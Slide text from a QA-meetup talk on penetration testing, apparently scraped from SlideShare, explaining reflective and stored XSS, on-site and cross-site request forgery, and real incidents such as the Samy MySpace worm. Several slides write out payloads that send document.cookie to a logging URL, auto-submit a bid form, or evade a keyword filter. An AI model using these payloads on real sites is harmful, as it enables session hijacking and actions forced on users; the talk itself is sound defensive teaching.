Your SlideShare is downloading. ×
Upcoming SlideShare
Loading in...5

Thanks for flagging this SlideShare!

Oops! An error has occurred.

Saving this for later? Get the SlideShare app to save on your phone or tablet. Read anywhere, anytime – even offline.
Text the download link to your phone
Standard text messaging rates apply



Published on

This was a full length talk presented by Amit Dhakkad in vodQA-3 : A QA Meet held in ThoughtWorks, Pune.

This was a full length talk presented by Amit Dhakkad in vodQA-3 : A QA Meet held in ThoughtWorks, Pune.

Published in: Technology
  • Be the first to comment

  • Be the first to like this

No Downloads
Total Views
On Slideshare
From Embeds
Number of Embeds
Embeds 0
No embeds

Report content
Flagged as inappropriate Flag as inappropriate
Flag as inappropriate

Select your reason for flagging this presentation as inappropriate.

No notes for slide


  • 1. AmitDhakad
    Application Developer
    Is considered a “survivor”
    Likes To Read About Black Magic & Illusions
  • 2. What, why and how’s ofPenetration Testing
    - AmitDhakad
  • 3. What do I plan to cover?
    What is Penetration Testing?
    What is it?
    Types of XSS
    Reflective XSS
    Stored XSS
    Request Forgery
    What is it?
    Types of Request Forgery
    On-site request forgery
    Cross-site request forgery
    Attack mechanisms
    Real world examples
    Why do we need to pay attention?
  • 4. Penetration Testing
    Simulating a malicious attack on a system
  • 5. Cross-site scripting (XSS)
    Injecting javascript through user-controllable fields
  • 6. Reflective XSS
    Injecting javascript using url parameters
  • 7. Diagram courtesy : The Web Application Hacker’s Handbook
  • 8. Attack:http://localhost:3000/pure-reflective-xss?query=title"onclick="window.location.href=('http://localhost:3000/log?message='%2Bdocument.cookie)
  • 9. Stored XSS
    Exploiting server’s ability to persist
  • 10. Diagram courtesy : The Web Application Hacker’s Handbook
  • 11. Attack:Image url is set to"onmouseover="window.location.href=('http://localhost:3000/log?message='+document.cookie)
  • 12. Request Forgery
    Perform unwitting actions on behalf of the user
  • 13. On-site Request Forgery (OSRF)
    From same domain
  • 14. Attack with XSS:Image url is set to“ onmouseover="var form=document.getElementById('new_bid'); form.bid_amount.value=100;form.submit();
  • 15. Attack without XSS:Image url is set to /bids?bid[amount]=500&bid[auction_id]=1
  • 16. Cross-site Request Forgery (CSRF)
    From a different domain
  • 17. Same origin policy
    A page residing on one domain can cause an arbitrary request to be made to another domain, but it cannot itself process the data returned from that request.
    A page residing on one domain can load a script from another domain and execute this within its own context.
  • 18. What can you do with XSS and Request Forgery?
    Session hijacking
    Performing arbitrary actions
    Disclosure of user data
  • 19. Real world attacks
  • 20. MySpace worm by Samy (XSS + OSRF)
    Bypassed all filters and added a script to his profile
    The script did two things:
    Added the visiting user as a friend
    The script got copied into the user’s profile
    Anyone visiting the new infected user also got added as Samy’s friend.
  • 21.
    • Protection:
    • 22. MySpace strips out the word "onreadystatechange" which is necessary for XML-HTTP requests
    • 23. Attack:
    • 24. eval('xmlhttp.onread' + 'ystatechange = callback');
  • Ebay – discovered by Dave Armstrong (OSRF)
    Crafted url set as image url
    Arbitrary bid was placed on behalf of the visiting user
  • 25. Mikeyy twitter worm (XSS + OSRF)
    Implemented by a 17-year old boy
    -- "<script src=""></script>"
    Visiting user got infected
    Infected users began twitting unwittingly.
  • 26. Gmail vulnerability – discovered by PetkoPetkov (CSRF)
    Add filter to forward all emails to the attacker’s email address
  • 27. Why we need to pay attention?
    Shift is towards attacking clients
    Technologies don’t provide strong protection
    Considered as lame attacks
    Identification using automated tools is difficult
    Penetration testing is considered as a separate vertical
  • 28. Break your own walls before anyone else does it
  • 29. Q & A
  • 30. Thank you